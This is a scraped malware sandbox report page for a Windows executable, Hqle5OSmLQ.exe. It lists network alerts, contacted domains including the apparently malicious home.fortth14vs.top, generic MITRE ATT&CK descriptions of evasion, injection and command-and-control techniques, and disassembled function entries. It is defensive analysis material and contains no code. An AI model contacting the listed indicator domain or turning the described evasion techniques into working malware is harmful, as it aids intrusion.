Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14vs.top
Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Hqle5OSmLQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
Hqle5OSmLQ.exe

Function 00AE255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282
fileCOMMON

Function 00AE29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Function 00AF05B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377
networkCOMMON

Function 00AF6FA0 Relevance: 6.3, APIs: 4, Instructions: 261
COMMON

Function 00BAB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Function 00BA9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Function 00B18B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Function 00AE2F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Function 00B19290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Function 00AE76A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73
networkCOMMON

Function 00AE7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Function 00AE75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Function 00BAAA30 Relevance: 6.4, APIs: 4, Instructions: 377
networkCOMMON

Function 00B1A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Function 00AFD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre